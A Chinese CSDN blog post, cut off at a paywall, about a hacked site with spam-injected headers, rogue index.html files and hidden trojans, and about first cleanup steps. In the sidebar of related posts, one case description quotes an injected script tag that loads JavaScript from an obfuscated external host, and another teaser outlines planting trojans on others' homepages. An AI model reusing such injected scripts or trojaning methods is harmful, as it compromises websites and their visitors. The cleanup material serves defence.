网站页头被挂马状态及新增了index.html文件解决思路

于 2023-11-17 16:46:15 发布
阅读量416 收藏
点赞数
文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mo3408/article/details/134466545
版权

今天网站刚新增了篇了文章《从nginx层阻断可执行的php 防止宝塔站点挂马》,整体测试下来还是不靠谱,设置后导致所有PHP文件都打不开了。 经过不断的查看日志和搜索办法总算告一段落,后续待观察。原因如下,多个网站目录新增了index.html文件,看时间是近两天上传的。

1697887770-7d3a51e5b5f19c0

网站代码中包含中文标题就是垃圾站的标题和网址,下面关键词和站点介绍一些违规垃圾网站的中文信息如XX博 彩,这种情况不用几天百度就K网站了。

1697887739-417ed2112326e99

另外找到几个隐藏下3-4目录下的木马文件。该木马如果不彻底找到系统后门哪怕把文件删除后过几天又会出现,代码如下

1697889207-6979b285cc743be

解决方法思路:

1、近期通过宝塔自带杀毒软件查杀,另一种方式把整站下载本地使用D盾查杀,不放心又用火绒杀毒软件查找&#

了解本专栏 订阅专栏 解锁全文 超级会员免费看
瑆箫
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
网站被黑终极大总结
xysoul的专栏
04-27 1336
1、 简单,登录网站后,杀毒软件报警,检查后,发现首index.asp检查,底部出现,清理掉后,页面即正常,这种主要以直接修改首文件为主,容易发现和清理。 2、 网后门 登录网站任何页面都出现杀毒报警,按之前的方法查看index.asp,并且去掉了iframe语句。但却发现问题依然存在,于是查看其他文件才发现,所有文件全部加上了语句,即使
关于网站的症状以及处理解决方法
网站安全专家
06-13 3087
如今绝大多数站长都在想着怎么建设外链,怎么发布网站内容,把自己网站的弄到首或是前三位,网站安全其实也需要站长们注意,因为一旦网站安全出了问题,网站的排名也会受到很大的影响。下面就仔细分析几种关于网站安全的现象以及处理的方法。网站解决办法第一种:网站“黑链”篡改了页面的内容就算百度没有更新算法,只要是碰到网站黑链,网站是必死无疑,一点别的可能性都没有。这可比使用作弊手法提高关键词排名来...
码方式html css,CSS代码解决问题
weixin_33740988的博客
06-17 225
两行CSS来解决,共5种方案一、iframe{n1ifm:expression(this.src=‘about:blank’,this.outerHTML=‘’);}/*这行代码是解决IFRAME木的哦*/script{nojs1:expression((this.src.toLowerCase().indexOf(‘http’)==0)?document.write(‘木被成功隔离!’):...
网站实用怎么解决的办法之一
网站安全专家
06-11 9866
最近单位网站在百度搜索点击打开都是SQ电影的内容,而直接输入网址反而没问题,在百度搜索中被提示为网站被黑的可能,很多客户搜索我们网站都进入了SQ电影网站,给公司的形象造成了很大的影响,作为公司的网站技术人员,以前也算是搞了5年的老站长了,什么事没惊着,从开始分析网站被黑的原因。
nginx / 后面的指向都转向 index.html
热门推荐
这是一个记录学习的博客
06-29 1万+
前几天在配置微信项目的时候,由于前端页面设置了路由,所以需要在nginx配置,将/ 后面的指向都指向首,在网上找了半天,找到了分享的一个方法,试了一下, 成功解决了这个问题,所以记录一下。server {        listen       80;          server_name  wechat.jk.com;         #charset koi8-r;        acc...
解决web网站清除方法
南清风
11-17 128
案例:某公司一个lamp的服务器网站站点目录下所有文件均被植入了广告脚本如下内容: <script language=javascriptsrc=http://%4%66E%78%72%67%2E%70%6F/x.js?google_ad=93x28_ad> </script>' 包括图片文件也为植入了,网站打开时就会调用这个地址,显示一个广告,造成的用户体验很恶劣,那么...
php实现批量删除文件及批量替换页面内容完整实例
10-21
主要介绍了php实现批量删除文件及批量替换页面内容的方法,涉及php文件与目录的遍历、查找以及字符串与数组的遍历与替换操作相关技巧,适用于utf-8编码环境,需要的朋友可以参考下
讲解SQL Server数据库被解决方案
08-04
一个网站遭遇入侵,破坏相当严重,SQL数据库被,所有的表里面大部分字段都被多次重复插入代码,查看日志,还好没有涉及到服务器的安全,只是数据库那里出现了很多异常警告而已,网站确实存在漏洞。...
通信与网络中的讲解SQL Server数据库被解决方案
11-18
一个网站遭遇入侵,破坏相当严重,SQL数据库被,所有的表里面大部分字段都被多次重复插入代码,查看日志,还好没有涉及到服务器的安全,只是数据库那里出现了很多异常警告而已,网站确实存在漏洞 ...
简单的方法解决网站程序漏洞被的问题
10-31
简单的方法解决网站程序漏洞被的问题(很实用)
网传宝塔“0day”事件—附检测脚本
最新发布
afei001
12-18 1307
宝塔面板疑似出现重大安全漏洞。遭到攻击的服务器,Nginx会自动检测header中accept字段是否包含Gzip。如果包含,则会向目标页面中加入一段JS引用,从而实现恶意
网站的原因排查,附图文操作教程
12-31 938
相信站长SEO们在日常网站优化过程中经常会遇到网站被黑恶意劫持的问题。网站怎么处理,如何进行排查呢? 本文结合自己的处理流程进行梳理并分享。 1)服务器防御性非常重要 多数站长选择便宜的不可靠的服务器,这往往最容易被入侵攻击。廉价的服务器机房基本上不会开启安全防护功能,入侵者利用漏洞轻松可以进行提权操作。 我本人一直使用大厂的服务器产品,推荐使用阿里云、腾讯云、百度云等,相对来说比小厂有保障些。前些天我的一台阿里云服务器收到安全风险提示短信,第一时间登录阿里云后台,找到云盾系统消息提示发现后门
生成 /index.html 时出错.出错原因:写入文件失败,解析模板“/index.html”时出错,模板可能不存在或可能无法通过任何配置的模板解析器访问...
weixin_35130780的博客
06-03 1432
我试图用spring-boot解析一个简单的index.html文件。如果我把本地主机:8080/index.html解决,或者我得到白色错误页面,如果我不知道。解析模板“/index.html”时出错,模板可能不存在或可能无法通过任何配置的模板解析器访问我把它贴在GIT上;这是一个非常简单的应用程序:Git Hub Link问题似乎是模型: 表型号:@Entity@Table(name="app...
防止和修复php网站(宝塔)
qq_40194668的博客
01-13 5156
防止和修复php网站
网站处理
爱生活
09-30 479
运用360扫描只能解决表面层面的问题,根本无法找出木所在文件 既然是web木就会留下访问的足迹 1.通过命令查询nginx的访问日志,因为涉及到上传文件,所以一定是通过POST方式来上传,那我们就查最近有哪些文件是POST访问的    cat *.log|grep "POST"|grep 200 | awk '{print $7}' |grep -o -E '.*.php' |
宝塔严重未知安全性漏洞(宝塔面板或Nginx异常)
Jan's的博客
12-09 5141
5、【企业版防篡改-重构版】插件可以有效防止网站被篡改,建议开启并设置root用户禁止修改文件(需要使用时再放开),另外,将。同时文件大小不一致的话,是因为安装方式的不同,极速安装包的安装大小一般都为5M,编译方式安装的大小大约为。)锁住,此目录在正常使用中不会有任何修改的行为,除了重装以外其他修改行为均可视为被篡改,所以将它锁上。另外,未出现异常问题正常使用的用户,我们给出加固建议,如果您担心面板存在风险,可以登录终端执行。1、升级面板到最新版,已经是最新版的,在首修复面板,并开启。
php网站,网详细教程
weixin_32353247的博客
03-10 1170
其实很简单的的,说到原理,就一个:就是在人家网站的主那里插入一个自己的网页面,等有漏洞的人查看了人家网站的主,那么他就成了你的肉鸡了。 下面我介绍5种方法,我一个一个介绍 方法一:这个就是最简单的了,只要你懂点html语言 把下面这段代码其实很简单的的,说到原理,就一个:就是在人家网站的主那里插入一个自己的网页面,等有漏洞的人查看了人家网站的主,那么他就成了你的肉鸡了。下面我介绍5...
公司网站有漏洞怎么解决
网站安全专家
01-18 3040
2019年1月14日消息,thinkphp又被爆出致命漏洞,可以直接远程代码执行,getshell提权写入网站网站根目录,甚至直接提权到服务器,该漏洞影响版本ThinkPHP 5.0、ThinkPHP 5.0.10、ThinkPHP5.0.12、ThinkPHP5.0.13、ThinkPHP5.0.23、thinkphp 5.0.22版本。 攻击者可以伪造远程恶意代码,对服务器进行po...
分析实践参考(上)1
08-03
2007 年 10 月,北京大学计算机科学技术研究所信息安全工程研究中心蜜网课题组的成员在利用蜜网系统分析网站时,发现了一个域名为 18dd.net 的网站。在链接分析的过程中,发现有大量恶意网最终都重定向到...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

瑆箫

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值